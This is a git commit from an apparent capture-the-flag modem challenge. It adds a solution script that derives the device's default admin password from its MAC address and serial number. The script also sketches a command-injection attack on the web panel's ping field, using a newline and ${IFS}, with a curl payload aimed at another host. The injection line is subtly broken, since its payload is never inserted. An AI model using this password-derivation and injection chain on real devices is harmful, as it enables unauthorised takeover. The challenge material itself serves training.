g/cyberchallenge-modem
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

sudo env_keep fix; added chown for keygen: update_key; utils.php ping down to 2

Browse Source
This commit is contained in:
Giulio 2020-09-20 19:15:00 +02:00
parent ee77cf25db
commit 6dd0aadd0d
4 changed files with 44 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
conf/etc/sudoers
View File

@ -1,5 +1,5 @@
Defaults env_reset Defaults env_reset
Defaults env_keep = "clearpassword" Defaults env_keep = "key"
Defaults mail_badpass Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults logfile="/var/log/sudo.log" Defaults logfile="/var/log/sudo.log"

4
keygen/keygen.c
View File

@ -73,8 +73,7 @@ unsigned* md5(const char *msg, int mlen)
static short rot1[] = { 5, 9, 14, 20 }; static short rot1[] = { 5, 9, 14, 20 };
static short rot2[] = { 4, 11, 16, 23 }; static short rot2[] = { 4, 11, 16, 23 };
static short rot3[] = { 6, 10, 15, 21 }; static short rot3[] = { 6, 10, 15, 21 };
static short *rots[] = { rot0, rot1, rot2, rot3 static short *rots[] = { rot0, rot1, rot2, rot3 };
};
static unsigned kspace[64]; static unsigned kspace[64];
static unsigned * k; static unsigned * k;
@ -205,6 +204,7 @@ int gen_update_key()
{ {
system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key"); system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key");
} }
chown("/etc/update_key", 1001, 1002);
chmod("/etc/update_key", 0600); chmod("/etc/update_key", 0600);
} }

40
solution/solution.py Normal file
View File

@ -0,0 +1,40 @@
import requests
import hashlib
def xorshift(x, y, z, w):
t = x
t = t ^ ((t << 11) & 0xFFFFFFFF)
t = t ^ (t >> 8)
x, y, z = y, z, w
w = (w ^ (w >> 19)) ^ t
return x, y, z, w, t
def keygen(mac, serial):
l = 20
password = ""
md5a = hashlib.md5(mac).hexdigest()
md5b = hashlib.md5(serial).hexdigest()
w = int(md5a[0:8], 16)
x = int(md5a[8:16], 16)
y = int(md5a[16:24], 16)
z = int(md5a[24:32], 16)
for i in range(0, l):
x, y, z, w, t = xorshift(x, y, z, w)
password += md5b[t % 20]
return password
def rce(username, password, host, payload):
requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
def main():
serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii")
mac = "ac:35:ee:ad:29:1b".encode("ascii")
host = "192.168.77.1"
payload = "curl 192.168.1.2:8080"
password = keygen(mac, serial)
print(password)
#rce("admin", password, host, payload)
main()

2
webpanel/utils.php
View File

@ -7,7 +7,7 @@ require_once("includes/nav.php");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) {
switch ($_POST['action']) { switch ($_POST['action']) {
case 'ping': case 'ping':
$cmd = '/bin/'.$_POST['action']. ' -c 4'; $cmd = '/bin/'.$_POST['action']. ' -c 2';
break; break;
case 'traceroute': case 'traceroute':
$cmd = '/usr/bin/'.$_POST['action']; $cmd = '/usr/bin/'.$_POST['action'];